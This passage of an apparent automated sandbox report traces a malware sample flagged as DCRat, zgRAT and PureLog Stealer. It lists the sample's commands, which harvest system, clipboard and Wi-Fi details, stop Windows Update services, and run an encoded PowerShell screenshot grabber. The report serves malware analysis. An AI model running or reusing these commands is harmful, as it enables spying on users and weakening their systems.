File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:27:11
Start date:	31/07/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6d9c90000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:27:12
Start date:	31/07/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff691a50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	22:27:12
Start date:	31/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	22:27:12
Start date:	31/07/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff72c810000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	22:27:12
Start date:	31/07/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff7699e0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	22:27:15
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	22:27:16
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	22:27:16
Start date:	31/07/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff691a50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
Imagebase:	0x7ff791cd0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	22:27:17
Start date:	31/07/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
Imagebase:	0x7ff6e6930000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	22:27:18
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	22:27:18
Start date:	31/07/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff704f20000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	22:27:18
Start date:	31/07/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff691a50000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	22:27:18
Start date:	31/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	22:27:18
Start date:	31/07/2024
Path:	C:\Recovery\HpQPPZazcv.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\HpQPPZazcv.exe
Imagebase:	0x860000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000045.00000002.2932877358.0000000003144000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000045.00000002.2932877358.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	70
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Recovery\HpQPPZazcv.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\HpQPPZazcv.exe
Imagebase:	0x90000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff7f8d70000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff7f8d70000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
Imagebase:	0x7ff791cd0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	22:27:19
Start date:	31/07/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff7f8d70000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	22:27:20
Start date:	31/07/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff7f8d70000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	22:27:20
Start date:	31/07/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"
Imagebase:	0x7ff6e6930000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	22:27:20
Start date:	31/07/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff7f8d70000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	22:27:21
Start date:	31/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	158
Start time:	22:27:58
Start date:	31/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.9%
Total number of Nodes:	1742
Total number of Limit Nodes:	44

Executed Functions

Function 00DAEA07 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 453
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

